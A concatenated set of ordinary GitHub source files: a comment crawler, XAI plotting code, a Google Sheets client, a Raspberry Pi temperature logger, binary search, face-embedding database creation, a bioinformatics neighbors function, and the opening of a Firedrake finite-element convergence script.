reply.find_element_by_class_name('u_cbox_cnt_unrecomm').text\n\n reply_dict = {\n \"comment_no\": comment_no,\n \"content\": content,\n \"nickname\": nickname,\n \"date\": date,\n \"likes\": likes,\n \"hates\": hates\n }\n\n except:\n reply_dict = None # 정치댓글 막힌 경우?\n print(\"Fail Crawling\", article_link)\n\n return reply_dict\n\n\n def get_best_replies(self, article_link):\n self.driver.get(article_link)\n\n time.sleep(1)\n reply_boxes = self.driver.find_elements_by_class_name('u_cbox_comment')\n\n self.replies = reply_boxes\n\n def update_reply_likes(self):\n # TODO: save best replies likes data for rank articles\n\n pass\n\n def quit(self):\n self.driver.quit()\n\n\n\nif __name__ == '__main__':\n naver = Naver()\n naver.run(article_num=3)\n naver.quit()\n","repo_name":"bandiming/Bamboo","sub_path":"Crawling/Go/naverV2.py","file_name":"naverV2.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5913323043","text":"import warnings\nimport numpy as np\nfrom ..base import ExplanationBase, DashFigure\n\n\nclass FeatureImportance(ExplanationBase):\n \"\"\"\n The class for feature importance explanations for time series tasks. It uses a list to store\n the feature importance explanations of the input instances. Each item in the list\n is a dict with the following format `{\"instance\": the input instance, \"scores\": feature importance scores}`,\n where both \"instance\" and \"scores\" are pandas dataframes.\n \"\"\"\n\n def __init__(self, mode, explanations=None):\n \"\"\"\n :param mode: The task type, e.g., `anomaly_detection` or `forecasting`.\n :param explanations: The explanation results for initializing ``FeatureImportance``,\n which is optional.\n \"\"\"\n super().__init__()\n self.mode = mode\n self.explanations = [] if explanations is None else explanations\n\n def __repr__(self):\n return repr(self.explanations)\n\n def add(self, instance, importance_scores, **kwargs):\n \"\"\"\n Adds the generated explanation corresponding to one instance.\n\n :param instance: The instance to explain.\n :param importance_scores: The feature importance scores.\n \"\"\"\n e = {\"instance\": instance, \"scores\": importance_scores}\n self.explanations.append(e)\n\n def get_explanations(self, index=None):\n \"\"\"\n Gets the generated explanations.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``.\n When ``index`` is None, the function returns a list of all the explanations.\n :return: The explanation for one specific instance (a dict)\n or the explanations for all the instances (a list of dicts).\n Each dict has the following format: `{\"instance\": the input instance,\n \"scores\": feature importance scores}`, where both \"instance\" and \"scores\" are\n pandas dataframes.\n :rtype: Union[Dict, List]\n \"\"\"\n return self.explanations if index is None else self.explanations[index]\n\n def plot(self, index=None, figure_type=None, max_num_variables_to_plot=25, **kwargs):\n \"\"\"\n Plots importance scores for time series data.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``,\n e.g., it will plot the first explanation result when ``index = 0``.\n When ``index`` is None, it plots all the explanations.\n :param figure_type: The figure type, e.g., plotting importance scores in a `timeseries` or a `bar`.\n :param max_num_variables_to_plot: The maximum number of variables to plot in the figure.\n :return: A matplotlib figure plotting feature importance scores.\n \"\"\"\n import matplotlib.pyplot as plt\n\n if len(self.explanations) == 0:\n return None\n if figure_type is not None:\n assert figure_type in [\"timeseries\", \"bar\"], \\\n \"`figure_type` can only be `timeseries` or `bar`.\"\n else:\n ts = self.explanations[0][\"instance\"]\n if ts.shape[1] == 1:\n # Univariate time series\n figure_type = \"timeseries\"\n else:\n # Multivariate time series\n figure_type = \"bar\" if ts.shape[0] == 1 else \"timeseries\"\n\n figures = []\n explanations = [self.explanations[index]] if index is not None \\\n else self.explanations\n\n if figure_type == \"timeseries\":\n for exp in explanations:\n ts, scores = exp[\"instance\"], exp[\"scores\"]\n num_variables = max(ts.shape[1], scores.shape[1])\n if num_variables > max_num_variables_to_plot:\n warnings.warn(\"The number of variables in the time series exceeds \"\n \"the maximum number of variables to plot.\")\n\n n = min(num_variables, max_num_variables_to_plot)\n num_rows = int(np.round(np.sqrt(n)))\n num_cols = int(np.ceil(n / num_rows))\n fig, axes = plt.subplots(num_rows, num_cols, squeeze=False)\n\n for i in range(n):\n row, col = divmod(i, num_cols)\n plt.sca(axes[row, col])\n # Plot the original time series\n if i < ts.shape[1]:\n left_ax = axes[row, col]\n ts_a = ts[[ts.columns[i]]]\n timestamps = [str(v) for v in ts_a.index.values]\n left_ax.plot(timestamps, ts_a.values.flatten(), color='k')\n left_ax.set_xticklabels(left_ax.get_xticks(), rotation=45)\n # Plot the importance scores\n right_ax = axes[row, col].twinx()\n ts_b = scores[[scores.columns[i]]]\n right_ax.plot(timestamps, ts_b.values.flatten(), color='r', label=\"score\")\n plt.title(f\"{scores.columns[i]}\")\n plt.grid()\n figures.append(fig)\n else:\n for exp in explanations:\n scores = exp[\"scores\"]\n min_values = np.min(scores.values, axis=0)\n max_values = np.max(scores.values, axis=0)\n flag = (np.abs(min_values) > np.abs(max_values)).astype(int)\n values = min_values * flag + max_values * (1 - flag)\n fnames = [f\"{c} \" for c in scores.columns]\n\n fig, ax = plt.subplots(1, 1)\n plt.sca(ax)\n positions = np.arange(len(values)) + 0.5\n colors = [\"green\" if x > 0 else \"red\" for x in values]\n plt.barh(positions, values, align=\"center\", color=colors)\n ax.yaxis.set_ticks_position(\"right\")\n plt.yticks(positions, fnames, ha=\"right\")\n figures.append(fig)\n return figures\n\n def _plotly_figure(self, index, **kwargs):\n import plotly\n import plotly.graph_objects as go\n from plotly.subplots import make_subplots\n\n exp = self.explanations[index]\n traces, score_traces = [], []\n color_list = plotly.colors.qualitative.Dark24\n ts, scores = exp[\"instance\"], exp[\"scores\"]\n # Original time series data\n for i in range(ts.shape[1]):\n v = ts[[ts.columns[i]]]\n color = color_list[i % len(color_list)]\n traces.append(go.Scatter(\n name=ts.columns[i],\n x=v.index,\n y=v.values.flatten(),\n mode=\"lines\",\n line=dict(color=color)\n ))\n # Feature importance scores\n for i in range(ts.shape[1]):\n v = scores[[ts.columns[i]]]\n color = color_list[i % len(color_list)]\n score_traces.append(go.Scatter(\n name=f\"{scores.columns[i]}_score\",\n x=v.index,\n y=v.values.flatten(),\n mode=\"lines\",\n line=dict(color=color, dash=\"dash\"),\n ))\n\n if \"@timestamp\" in scores:\n v = scores[[\"@timestamp\"]]\n score_traces.append(go.Scatter(\n name=\"timestamp_score\",\n x=v.index,\n y=v.values.flatten(),\n mode=\"lines\",\n line=dict(color=\"black\", dash=\"dash\"),\n ))\n\n layout = dict(\n showlegend=True,\n xaxis=dict(\n title=\"Time\",\n type=\"date\",\n rangeselector=dict(\n buttons=list(\n [\n dict(count=7, label=\"1w\", step=\"day\", stepmode=\"backward\"),\n dict(count=1, label=\"1m\", step=\"month\", stepmode=\"backward\"),\n dict(count=6, label=\"6m\", step=\"month\", stepmode=\"backward\"),\n dict(count=1, label=\"1y\", step=\"year\", stepmode=\"backward\"),\n dict(step=\"all\"),\n ]\n )\n )\n ),\n )\n fig = make_subplots(\n figure=go.Figure(layout=layout),\n specs=[[{\"secondary_y\": True}]]\n )\n fig.update_yaxes(title_text=\"Timeseries\")\n fig.update_yaxes(title_text=\"Importance Score\", secondary_y=True)\n for trace_a, trace_b in zip(traces, score_traces):\n fig.add_trace(trace_a)\n fig.add_trace(trace_b, secondary_y=True)\n if len(score_traces) > len(traces):\n for trace_b in score_traces[len(traces):]:\n fig.add_trace(trace_b, secondary_y=True)\n return fig\n\n def plotly_plot(self, index=0, **kwargs):\n \"\"\"\n Plots feature importance scores for one specific instance using Dash.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``\n which cannot be None, e.g., it will plot the first explanation result\n when ``index = 0``.\n :return: A plotly dash figure plotting feature importance scores.\n \"\"\"\n assert index is not None, \"`index` cannot be None for `plotly_plot`. \" \"Please specify the instance index.\"\n return DashFigure(self._plotly_figure(index, **kwargs))\n\n def ipython_plot(self, index=0, **kwargs):\n \"\"\"\n Plots the feature importance scores in IPython.\n\n :param index: The index of an explanation result stored in ``FeatureImportance``,\n which cannot be None, e.g., it will plot the first explanation result\n when ``index = 0``.\n \"\"\"\n import plotly\n\n assert index is not None, \"`index` cannot be None for `ipython_plot`. \" \"Please specify the instance index.\"\n plotly.offline.iplot(self._plotly_figure(index, **kwargs))\n\n def to_json(self):\n raise RuntimeError(\"`FeatureImportance` for timeseries cannot be converted into JSON format.\")\n\n @classmethod\n def from_dict(cls, d):\n raise RuntimeError(\"`FeatureImportance` for timeseries does not support `from_dict`.\")\n","repo_name":"salesforce/OmniXAI","sub_path":"omnixai/explanations/timeseries/feature_importance.py","file_name":"feature_importance.py","file_ext":"py","file_size_in_byte":10153,"program_lang":"python","lang":"en","doc_type":"code","stars":730,"dataset":"github-code","pt":"44"} +{"seq_id":"34073327112","text":"import os\n\nimport httplib2\nfrom googleapiclient.discovery import build\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nimport creds\n\n\ndef main():\n def get_service_simple():\n return build('sheets', 'v4', developerKey=creds.api_key)\n\n def get_service_sacc():\n creds_json = os.path.dirname(__file__) + \"/creds/credentials.json\"\n scopes = ['https://www.googleapis.com/auth/spreadsheets']\n\n creds_service = ServiceAccountCredentials.from_json_keyfile_name(\n creds_json,\n scopes).authorize(\n httplib2.Http())\n return build('sheets', 'v4', http=creds_service)\n\n # service = get_service_simple()\n service = get_service_sacc()\n sheet = service.spreadsheets()\n\n sheet_id = \"1Pap_tpnRr2VOU9ecBvGBGJkJXNnzFULTkIIsGfuT1Ew\"\n # resp = sheet.values().get(spreadsheetId=sheet_id,\n # range=\"Лист1!A1:A999\").execute()\n resp = sheet.values().batchGet(spreadsheetId=sheet_id,\n ranges=[\"Лист1\", \"Лист2\"]).execute()\n\n print(resp)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ishauchuk/google_sheets_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43400501305","text":"\"\"\" Records the temperature of two locations and sends the file via email \"\"\"\n#!/usr/bin/python3\n\n# generic imports\nimport time\nimport os\nimport sys\ntry:\n import httplib\nexcept:\n import http.client as httplib\n\n# imports for email\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n# imports for temperature\nif sys.platform != \"darwin\":\n RASPI_BOOL = True\n import Adafruit_DHT\n\n SENSOR_1 = SENSOR_2 = Adafruit_DHT.DHT22\nelse:\n RASPI_BOOL = False\n\n#GPIO setup\nimport RPi.GPIO as GPIO\nLEDpin = 24\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(LEDpin, GPIO.OUT,initial=GPIO.HIGH) # set LED pin as output\n\n# Globals\nwith open(\"email_password.txt\", \"r\") as file:\n SRC_USERNAME, SRC_PASSWORD = file.read().split(\" \")\n\n# TODO: update to accept more than a single email from file\nwith open(\"destination_email_list.txt\", \"r\") as file:\n MAIL_LIST = [line.split(\", \") for line in file.readlines()]\n\nPIN_1 = 17 #Ambient\nPIN_2 = 23 #Remote\nDATAFILE = \"temperature_data.txt\"\nBOOT_TIME = time.time()\nLED_ON_TIME = 10 # default LED blink time\nglobal ssid\n\n##########################################\n# FUNCTION TO GET SSID NAME\n##########################################\ndef get_network_ssid():\n global ssid\n ssid = os.popen(\"sudo iwgetid -r\").read()\n ssid = ssid.strip()\n #print(ssid)\n\n\n##########################################\n# FUNCTION TO RECORD TEMPERATURE\n##########################################\ndef record_temperature():\n global ssid\n \"\"\" Records the temperature to the data file \"\"\"\n file_name = open(DATAFILE, \"a+\")\n try:\n if RASPI_BOOL:\n humidity_1, temperature_1 = Adafruit_DHT.read_retry(SENSOR_1, PIN_1)\n humidity_2, temperature_2 = Adafruit_DHT.read_retry(SENSOR_2, PIN_2)\n else:\n humidity_1 = humidity_2 = temperature_1 = temperature_2 = None\n if humidity_1 is None or temperature_1 is None:\n humidity_1 = 100\n temperature_1 = 100\n if humidity_2 is None or temperature_2 is None:\n humidity_2 = 100\n temperature_2 = 100\n except RuntimeError:\n # TODO: Will this still set the temperatures that are used below?\n file_name.write(\"Error reading sensor!\\r\\n\")\n else:\n if temperature_1 is None:\n temperature_1 = 100\n if temperature_2 is None:\n temperature_2 = 100\n temperature_1 = (temperature_1 - 3) * 9 / 5.0 + 32\n temperature_2 = temperature_2 * 9 / 5.0 + 32\n global LED_ON_TIME\n if temperature_2 > 45: # Changes LED cylce time based above or below 45F\n LED_ON_TIME = 0.5 # Time is seconds\n else:\n LED_ON_TIME = 3 # Blinks slower if temp is good.\n file_name.write(\n \"%s Ambient Temp %d Ambient Humidity %d Fridge Temp %d SSID:%s \\r\\n\"\n % (\n time.strftime(\"%b %d - %H:%M:%S\"),\n temperature_1,\n humidity_1,\n temperature_2,\n ssid,\n )\n )\n file_name.close()\n print(ssid)\n\n##########################################\n# FUNCTION TO ADD UPTIME TO TOP OF FILE\n##########################################\ndef add_uptime_to_file():\n \"\"\" Adds the raspberry pi uptime to the data file \"\"\"\n uptime = time.time() - BOOT_TIME\n days = int(uptime / 86400)\n hours = int(uptime % 86400 / 3600)\n minutes = int(uptime % 3600 / 60)\n seconds = int(uptime % 60)\n with open(DATAFILE, \"r\") as data_file:\n temp = data_file.read()\n with open(DATAFILE, 'w') as data_file:\n data_file.write(\n \"\\rTotal Uptime (D:H:M:S) = %d:%d:%02d:%02d \\r\\n\" % (\n days,\n hours,\n minutes,\n seconds\n )\n )\n with open(DATAFILE, 'a') as data_file:\n data_file.write(temp)\n\n##########################################\n# UPDATE LOG FILE MESSAGE\n##########################################\ndef network_message(message, message1):\n \"\"\" Writes reboot message to the log file \"\"\"\n file_name = open(DATAFILE, \"a+\")\n file_name.write(\n \"%s %s %s \\r\\n\"\n % (\n time.strftime(\"%b %d - %H:%M:%S\"),\n message, message1\n )\n )\n file_name.close()\n\n##########################################\n# CREATE WATCHDOG FILE\n##########################################\ndef watchdog():\n \"\"\" Creates the watchdog file to make sure we are still running \"\"\"\n file_name = open(\"mywatchdog.txt\", \"w\")\n file_name.write(\n \"%s %s \\r\\n\"\n % (\n time.strftime(\"%b %d - %H:%M:%S\"),\n \" Watchdog written\"\n )\n )\n file_name.close()\n\n\n##########################################\n# Function to check internet / wifi\n##########################################\ndef check_connection(url):\n \"\"\" Verifies the raspberry pi is still connected to the internet \"\"\"\n conn = httplib.HTTPConnection(url, timeout=2)\n try:\n# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# sock.connect((url,80))\n# _ = requests.get(url, timeout=timeout)\n conn.request(\"HEAD\", \"/\")\n conn.close()\n message = \" status is up\"\n# except requests.ConnectionError:\n except:\n conn.close()\n message = \" status is down\"\n return message\n\n##########################################\n# FUNCTION TO SEND EMAILS\n##########################################\ndef send_email():\n \"\"\" Sends the data file via email \"\"\"\n for email_address in MAIL_LIST[0]:\n files = []\n files.append(DATAFILE)\n text = \"{}/{} Trailer Sensor Readings\".format(\n time.localtime(time.time()).tm_mon, time.localtime(time.time()).tm_mday\n )\n msg = MIMEMultipart()\n msg[\"Subject\"] = text\n msg[\"From\"] = SRC_USERNAME\n msg[\"To\"] = email_address\n msg.attach(MIMEText(text))\n print(\"email_address\")\n print(email_address)\n print(\"--------\")\n for data_file in files:\n part = MIMEBase(\"application\", \"octet-stream\")\n part.set_payload(open(data_file, \"rb\").read())\n encoders.encode_base64(part)\n part.add_header(\n \"Content-Disposition\",\n 'attachment; filename=\"%s\"' % os.path.basename(data_file),\n )\n msg.attach(part)\n server = smtplib.SMTP(\"smtp.gmail.com:587\")\n server.ehlo_or_helo_if_needed()\n server.starttls()\n server.ehlo_or_helo_if_needed()\n server.login(SRC_USERNAME, SRC_PASSWORD)\n server.sendmail(SRC_USERNAME, email_address, msg.as_string())\n server.quit()\n\n\n##########################################\n# FUNCTION TO RESTART RASPI\n##########################################\ndef restart_pi():\n \"\"\" Restarts the raspberry pi \"\"\"\n command = \"/usr/bin/sudo /sbin/shutdown -r now\"\n import subprocess\n print(\"Entered restart subroutine REBOOTING\")\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output = process.communicate()[0]\n print(output)\n\n##########################################\n# MAIN FUNCTION\n##########################################\ndef main():\n \"\"\" Main function \"\"\"\n email_sent_today = False\n measurement_taken = False\n #Multiple websites to reduce frequency of pings per site\n websites = [\n \"www.google.com\",\n \"www.github.com\",\n \"www.bing.com\",\n \"www.msn.com\",\n \"www.yahoo.com\",\n \"www.amazon.com\"\n ]\n ip_address = \"192.168.0.100\" # Internal netowrk IP\n reboot_message = \"Power loss Rebooting / Starting up \"\n new_wifi_status = wifi_status = \"WIFI\"\n internet_status = \"Internet\"\n network_message(reboot_message, \" \") # adds reboot message on bootup\n url_index = 0 # URL list counter\n LED_on = True #Default LED is on during start-up\n TEST_INTERNET_IN_SEC = 10 #Must be greater than 4 sec or considered a DoS.\n INTERNET_TIME = (time.time() - (TEST_INTERNET_IN_SEC*2)) # force test first time through\n LED_TIME = time.time()\n global LED_ON_TIME\n global ssid\n get_network_ssid() # get network ssid\n #print(ssid)\n while True:\n time.sleep(0.5) # ADDED TO CUT DOWN ON CPU USAGE\n\n # Has internet test interval time been exceeded?\n if (time.time()-INTERNET_TIME) \\\n > TEST_INTERNET_IN_SEC:\n\n new_internet_status = (\"Internet\" + check_connection(websites[url_index]))\n INTERNET_TIME = time.time()\n # Has the internet status changed?\n if internet_status != new_internet_status:\n # Update log file with Internet connectivity status and which url used\n network_message(new_internet_status, websites[url_index])\n internet_status = new_internet_status\n new_wifi_status = \"WIFI\" + check_connection(ip_address) # Check WIFI status\n\n # Has WIFI status changed\n if wifi_status != new_wifi_status:\n network_message(new_wifi_status, ip_address) # Update log file\n wifi_status = new_wifi_status\n\n url_index = (url_index + 1) % len(websites) # update url counter allowing for wraparound\n #Blink I'm alive LED, LED on time is based on temperature\n if (time.time()-LED_TIME) > LED_ON_TIME:\n LED_TIME = time.time()\n if LED_on:\n GPIO.output(LEDpin, GPIO.LOW)\n LED_on = False\n else:\n GPIO.output(LEDpin, GPIO.HIGH)\n LED_on = True\n # TODO: start using unix time to simplify the conditional statements\n # once every hour reset WIFI to reconnect to priority WIFI\n if time.localtime(time.time()).tm_min == 30 \\\n and time.localtime(time.time()).tm_sec == 30 \\\n and ssid != \"ZLake\":\n os.system(\"sudo ifconfig wlan0 down\")\n os.system(\"sudo ifconfig wlan0 up\")\n if time.localtime(time.time()).tm_sec == 0 and not measurement_taken:\n get_network_ssid() # get active network ssid\n watchdog() #Create watchdog file every min.\n record_temperature()\n measurement_taken = True\n elif time.localtime(time.time()).tm_sec != 0 and measurement_taken:\n measurement_taken = False\n\n # add the uptime to the file before emailing\n if time.localtime(time.time()).tm_hour == 10 \\\n and not email_sent_today and internet_status == \"Internet status is up\":\n\n add_uptime_to_file()\n send_email()\n os.remove(DATAFILE)\n email_sent_today = True\n\n elif time.localtime(time.time()).tm_hour == 11 and email_sent_today:\n email_sent_today = False\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mheida17/Raspi_FridgeSensor","sub_path":"sensorPython.py","file_name":"sensorPython.py","file_ext":"py","file_size_in_byte":10913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5141656187","text":"# Python Program for recursive binary search.\n\ndef binary_search(arr, left, right, searchValue):\n\n if right >= left:\n midNo = round(left + (right - left) / 2)\n\n if arr[midNo] == searchValue:\n return midNo\n elif arr[midNo] > searchValue:\n return binary_search(arr,left, midNo-1, searchValue)\n else:\n return binary_search(arr,midNo+1, right, searchValue)\n else:\n return -1\n\narr = [12,34,44,67,88,99,101,123,145,888]\n\nsearchValue = 101\n\nresult = binary_search(arr, 0, len(arr)-1, searchValue)\n \nif result != -1:\n print (\"Element is present at index %d\" % result)\nelse:\n print (\"Element is not present in array\")\n","repo_name":"jaskaran87/Data-Structures-and-Algorithms-in-Python","sub_path":"search-algorithm/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"2444449765","text":"import numpy as np\r\nimport mediapipe as mp\r\nimport cv2\r\nimport time\r\nimport os\r\nfrom os import listdir, path\r\nimport math\r\nfrom PIL import Image,ImageEnhance\r\nfrom tensorflow.keras.preprocessing.image import load_img, save_img, img_to_array\r\nimport pandas as pd\r\nimport pickle\r\n\r\n\r\n\r\n\r\n\r\ndef load_image(img): # To Load an image whatever its type \r\n\r\n exact_image = False\r\n if type(img).__module__ == np.__name__:\r\n exact_image = True\r\n\r\n base64_img = False\r\n if len(img) > 11 and img[0:11] == \"data:image/\":\r\n base64_img = True\r\n\r\n #---------------------------\r\n\r\n if base64_img == True:\r\n img = loadBase64Img(img)\r\n\r\n elif exact_image != True: #image path passed as input\r\n if os.path.isfile(img) != True:\r\n raise ValueError(\"make sure that \",img,\" exists\")\r\n\r\n img = cv2.imread(img)\r\n\r\n return img\r\n\r\n\r\ndef preprocess_image_with_mediaPipe(faceDetection,image_path): # Face Detection and alignment for DB Creation\r\n img = load_image(image_path)\r\n ih, iw, _ = img.shape\r\n results = faceDetection.process(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\r\n\r\n if results.detections: \r\n for id, detection in enumerate(results.detections):\r\n bboxC = detection.location_data.relative_bounding_box\r\n\r\n right_eye_center=(int (detection.location_data.relative_keypoints[1].x * iw) , int(detection.location_data.relative_keypoints[1].y * ih))\r\n left_eye_center=(int(detection.location_data.relative_keypoints[0].x * iw) , int(detection.location_data.relative_keypoints[0].y * ih))\r\n\r\n\r\n\r\n x=int(bboxC.xmin * iw)\r\n y=int(bboxC.ymin * ih)\r\n w =int(bboxC.width * iw)\r\n h =int(bboxC.height * ih)\r\n detected_face = img[int(y):int(y+h), int(x):int(x+w)] #crop detected face \r\n\r\n img = detected_face\r\n\r\n\r\n left_eye_x = left_eye_center[0]; left_eye_y = left_eye_center[1]\r\n right_eye_x = right_eye_center[0]; right_eye_y = right_eye_center[1]\r\n\r\n\r\n if left_eye_y > right_eye_y:\r\n\r\n point_3rd = (right_eye_x, left_eye_y)\r\n direction = -1 #rotate same direction to clock\r\n #print(\"rotate to clock direction\")\r\n else:\r\n\r\n point_3rd = (left_eye_x, right_eye_y)\r\n direction = 1 #rotate inverse direction of clock\r\n #print(\"rotate to inverse clock direction\")\r\n\r\n\r\n\r\n def euclidean_distance(a, b):\r\n x1 = a[0]; y1 = a[1]\r\n x2 = b[0]; y2 = b[1]\r\n return math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)))\r\n a = euclidean_distance(left_eye_center, point_3rd)\r\n b = euclidean_distance(right_eye_center, left_eye_center)\r\n c = euclidean_distance(right_eye_center, point_3rd)\r\n\r\n cos_a = (b*b + c*c - a*a)/(2*b*c)\r\n #print(\"cos(a) = \", cos_a)\r\n\r\n angle = np.arccos(cos_a)\r\n #print(\"angle: \", angle,\" in radian\")\r\n\r\n angle = (angle * 180) / math.pi\r\n # print(\"angle: \", angle,\" in degree\")\r\n if direction == -1:\r\n angle = 90 - angle\r\n\r\n\r\n new_img = Image.fromarray(img)\r\n new_img = np.array(new_img.rotate(direction * angle))\r\n #cv2.imshow(\"Face After enhancement and rotating\",new_img)\r\n #cv2.waitKey(1)\r\n img = img_to_array(new_img)\r\n img = cv2.resize(img, (160, 160))\r\n img = np.expand_dims(img, axis=0) \r\n\r\n mean, std = img.mean(), img.std()\r\n img = (img-mean)/std\r\n return img\r\n else : \r\n raise Exception(\"Make sure that face in image with path \",image_path, \" has a face ! \")\r\n\r\n\r\ndef findEuclideanDistance(source_representation, test_representation): \r\n euclidean_distance = source_representation - test_representation\r\n euclidean_distance = np.sum(np.multiply(euclidean_distance, euclidean_distance))\r\n euclidean_distance = np.sqrt(euclidean_distance)\r\n return euclidean_distance\r\n\r\n\r\n\r\n\r\n\r\ndef Create_DB(employees,db_path,interpreter, input_details, output_details): #Create representation for face in DB\r\n file_name = \"representations.pkl\"\r\n St =time.time()\r\n HomeownerPath=db_path+\"/\"+\"HomeOwners\"\r\n if path.exists(HomeownerPath+\"/\"+file_name):\r\n\r\n print(\"WARNING: Representations for images in \",HomeownerPath,\" folder were previously stored in \", file_name, )\r\n print( \"Thus, if you added new instances after this file creation, then please delete this file and call find function again. It will create it again.\")\r\n print(HomeownerPath+\"/\"+file_name, 'rb')\r\n f = open(HomeownerPath+\"/\"+file_name, 'rb')\r\n representations = pickle.load(f)\r\n\r\n print(\"There are \", len(representations),\" representations found in \",file_name)\r\n #print(representations)\r\n return representations\r\n \r\n elif(len(listdir(HomeownerPath))):\r\n faceDetection = mp.solutions.face_detection.FaceDetection(0.8)\r\n\r\n for employee in listdir(HomeownerPath):\r\n if(employee != file_name):\r\n for img in listdir(HomeownerPath +\"/\"+employee):\r\n #employee, extension = file.split(\".\")\r\n #TmpPath= HomeownerPath + \"\\%s.jpg\"\r\n img = preprocess_image_with_mediaPipe(faceDetection, HomeownerPath +\"/\"+employee+\"/\"+img )\r\n img_pixels= np.array(img, dtype=np.float32)\r\n interpreter.set_tensor(input_details[0]['index'],img_pixels )\r\n interpreter.invoke()\r\n representation = interpreter.get_tensor(output_details[0]['index'])\r\n employees.append((employee,representation))\r\n\r\n #-------------------------------\r\n\r\n \r\n\r\n print(\"Faces In DB representations retrieved successfully\")\r\n file_name = \"representations.pkl\"\r\n f = open(HomeownerPath+\"/\"+file_name, \"wb\")\r\n pickle.dump(employees, f)\r\n f.close()\r\n #print (employees)\r\n print(\"it takes \" , round(time.time() -St , 2),\" seconds To Create DB From Scratch\")\r\n print(\"Representations stored in \",HomeownerPath+\"/\"+file_name,\" file. Please delete this file when you add new identities in your database.\")\r\n return employees\r\n else:\r\n raise ValueError(\"There is no images in \", db_path,\" folder! Validate .jpg or .png files exist in this path.\")","repo_name":"KerolosMelad/Smart-home-system","sub_path":"CreateDB.py","file_name":"CreateDB.py","file_ext":"py","file_size_in_byte":6391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19837355019","text":"# def InmediateNeighbors(pat):\n# Neighborhood = [pat]\n# nucleotide = {'A','C','G','T'}\n# for i in range(1, len(pat)):\n# symbol = pat[i]\n# for j in nucleotide:\n# if j!=symbol:\n# Neighbor=pat[:i]+j+pat[i+1:]\n# Neighborhood.append(Neighbor)\n# return Neighborhood\n\n# print(InmediateNeighbors('AATAC'))\n\n# def Neighbors(pat):\n# Neighborhood = [pat]\n# nucleotide = {'A','C','G','T'}\n# pat1=pat[1:]\n# Neigh =[]\n# for i in range(len(pat1)):\n# symbol = pat1[i]\n# for j in nucleotide:\n# if j!=symbol:\n# Neighbor=pat1[:i]+j+pat1[i+1:]\n# Neighborhood.append(Neighbor)\n# Neigh.append(pat[0]+Neighbor)\n# for i in range()\n# Neigh.append(pat[0]+Neighborhood[-1])\n# Neigh.append(nucleotide+pat[-1])\n# return Neigh\n\n# print(Neighbors('CAA'))\n\ndef Hamming(p,q):\n count =0\n for i in range(len(p)):\n if p[i]!=q[i]:\n count +=1\n return count\n\n\ndef Neighbors(pat,d):\n nucleotide = ['A','C','G','T']\n if d==0:\n return pat\n if len(pat) ==1:\n return nucleotide\n Neighboorhood = set()\n Suffixneighbors = Neighbors(pat[1:len(pat)],d)\n for i in Suffixneighbors:\n if Hamming(i, pat[1:len(pat)])<d:\n for j in nucleotide:\n Neighboorhood.add(j+i)\n else:\n Neighboorhood.add(pat[0]+i)\n return Neighboorhood\n\nprint(Neighbors('ACG',1)) \n\nprint(' '.join([str(elem) for elem in list(Neighbors('CTTATTAT',2))]).replace(' ',' '))","repo_name":"maiderag/BioinformaticsI","sub_path":"Neighbors.py","file_name":"Neighbors.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33441357517","text":"\"\"\"\nThis module runs a convergence history for a hybridized-DG\ndiscretization of a model elliptic problem (detailed in the main\nfunction). The method used is the LDG-H method.\n\"\"\"\n\nfrom firedrake import *\nfrom firedrake.petsc import PETSc\nfrom firedrake import COMM_WORLD\nimport numpy as np\nimport pandas as pd\n\n\ndef run_LDG_H_problem(r, degree, tau_order, write=False):\n \"\"\"\n Solves the Dirichlet problem for the elliptic equation:\n\n -div(grad(u)) = f in [0, 1]^2, u = g on the domain boundary.\n\n The source function f and g are chosen such that the analytic\n solution is:\n\n u(x, y) = sin(x*pi)*sin(y*pi).\n\n This problem was crafted so that we can test the theoretical\n convergence rates for the hybridized DG method: LDG-H. This\n is accomplished by introducing the numerical fluxes:\n\n u_hat = lambda,\n q_hat = q + tau*(u - u_hat).\n\n The Slate DLS in Firedrake is used to perform the static condensation\n of the full LDG-H formulation of the Poisson problem to a single\n system for the trace u_hat (lambda) on the mesh skeleton:\n\n S * Lambda = E.\n\n The resulting linear system is solved via a direct method (LU) to\n ensure an accurate approximation to the trace variable. Once\n the trace is solved, the Slate DSL is used again to solve the\n elemental systems for the scalar solution u and its flux q.\n\n Post-processing of the scalar variable, as well as its flux, is\n performed using Slate to form and solve the elemental-systems for\n new approximations u*, q*. Depending on the choice of tau, these\n new solutions have superconvergent properties.\n\n The post-processed scalar u* superconverges at a rate of k+2 when\n two conditions are satisfied:\n\n (1) q converges at a rate of k+1, and\n (2) the cell average of u, ubar, superconverges at a rate of k+2.\n\n The choice of tau heavily influences these two conditions. For all\n tau > 0, the post-processed flux q* has enhanced convervation\n properties! The new solution q* has the following three properties:\n\n (1) q* converges at the same rate as q. However,\n (2) q* is in H(Div), meaning that the interior jump of q* is zero!\n And lastly,\n (3) div(q - q*) converges at a rate of k+1.\n\n The expected (theoretical) rates for the LDG-H method are\n summarized below for various orders of tau:\n\n -----------------------------------------------------------------\n u q ubar u* q* div(p*)\n 